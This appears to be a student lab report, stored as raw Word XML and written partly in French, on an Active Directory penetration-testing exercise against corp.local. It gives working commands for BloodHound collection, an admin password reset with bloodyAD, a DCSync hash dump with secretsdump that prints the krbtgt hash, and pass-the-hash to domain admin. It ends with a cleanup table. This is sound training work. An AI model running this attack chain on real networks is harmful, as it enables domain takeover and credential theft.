    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kerberoasting obtains service-ticket material from the domain, then tests password guesses </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">offline</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> against the captured hashes. Hashcat does not submit each guess to the domain controller, so those guesses do not increment account login-failure counters or trigger account lockouts. This differs from password spraying, which sends actual authentication attempts to SMB and can contribute to lockouts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">this command allows me to create a zip file containing information from the domain, allowing bloodhound to map it out and help use move forward with the privilege escalation. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">command : </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bloodhound-ce.py -u jdoe -p 'Summer2026!' -d corp.local -dc dc01.corp.local -ns 10.10.10.10 -c All --zip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="1346200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="20"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1346200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> we can then launch Bloodhound and copy paste the password somewhere safe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="3200400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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password : </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WHIXizVVHsLwHCj9Wg4FTgZxkzw2kQnI</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731200" cy="2692400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1"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j’ai galéré, mais j’ai réussi à générer un rapport zip grâce à la commande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```bloodhound-ce.py -u jdoe -p 'Summer2026!' -d corp.local -dc dc01.corp.local -ns 10.10.10.10 -c All --zip```</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731200" cy="1346200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="16"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et à l’insérer dans bloodhound pour avoir une meilleure vue du domaine : </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="2641600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9"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je recherche un chemin vers les domain admins :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731200" cy="2755900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4"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 found a pretty cool path from an owned account to the Corp.local domain, it does from svc_backup to an admin account named adm_msmith, the two are linked by GenericAll permissions, meaning that the svc backup can manipulate the admin account like a puppet. </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Then, the admin account is linked to corp.local by DCSync, that allows for a Dcsync attack using mimikatz, allowing the attacker to make requests to other Domain Controllers, and, in a nutshell, have total control over the current domain :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731200" cy="2755900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2"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So the next step now is to reset the admin’s password using bloodyAD tool, with this command :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bloodyAD -u svc_backup -p 'Backup2020' -d corp.local --host dc01.corp.local set password ADM_MSMITH 'Test1234!'</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then we verify with this command :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nxc smb 10.10.10.10 -u ADM_MSMITH -p 'Test1234!'</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731200" cy="1498600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6"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Next step is to do a DCSync attack over the domain in order to take over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we do this using this command :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secretsdump.py 'corp.local/adm_msmith:Test1234!@10.10.10.10' -just-dc-ntlm</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731200" cy="1663700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="13"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731200" cy="1663700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and we have now access to the domain users’ hashes , this is the krbtgt’s hash line : </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f9dbafc79970e98104de04e214bafd6b:::</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answers to the three questions :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Three accounts have identical hashes: NTLM hashing is deterministic, so identical hashes indicate identical passwords, barring an extraordinarily unlikely collision. In the context of your lab, this supports the Phase 2 finding that multiple accounts shared a password.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Hash </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">31d6cfe0d16ae931b73c59d7e0c089c0</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: This is the NT hash of an empty password. It is a classic indicator to recognise when analysing Windows password-hash dumps.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 account name ends in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This is typically a computer or machine account. Machines have account passwords too, used for authentication and their secure channel with the domain; Windows manages and rotates these automatically in normal configurations.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Next step is to use Pass-the-hash technique to use the administrator account, meaning we don’t have to crack it, we just need to feed the hash to the domain using this command :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nxc smb 10.10.10.10 -u Administrator -H e370a33a8874c1d7e43ddb0c9e5e3311</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000086">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nxc smb 10.10.10.10 -u Administrator -H e370a33a8874c1d7e43ddb0c9e5e3311 --shares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731200" cy="1511300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8"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we are now domain admins, proven by the (admin) thingy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what our cleanup table could look like :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3.938265704008"/>
        <w:gridCol w:w="2066.544237880808"/>
        <w:gridCol w:w="4085.0293074388073"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2873.938265704008"/>
            <w:gridCol w:w="2066.544237880808"/>
            <w:gridCol w:w="4085.029307438807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b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Artefact /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center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>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center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Action / status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Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
                <w:color w:val="188038"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Password changed for </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
                <w:color w:val="188038"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">adm_msmith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corp.local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Record the change; restore if required by lab instructions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BloodHound collector ZIP and JSON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Exegol / host Downloads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Evidence collected; remove temporary copies when no longer needed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BloodHound graph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BloodHound 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Collection imported; remove the lab dataset if required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Pass-the-Hash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Exegol terminal /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Successful authentication and share enumeration captured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Fonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
                <w:color w:val="188038"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">krbtgt</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> NT 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Lab report / evidence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Verify that it is recorded securely</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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23.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.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getnpusers.py" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.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20.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId12"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13.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.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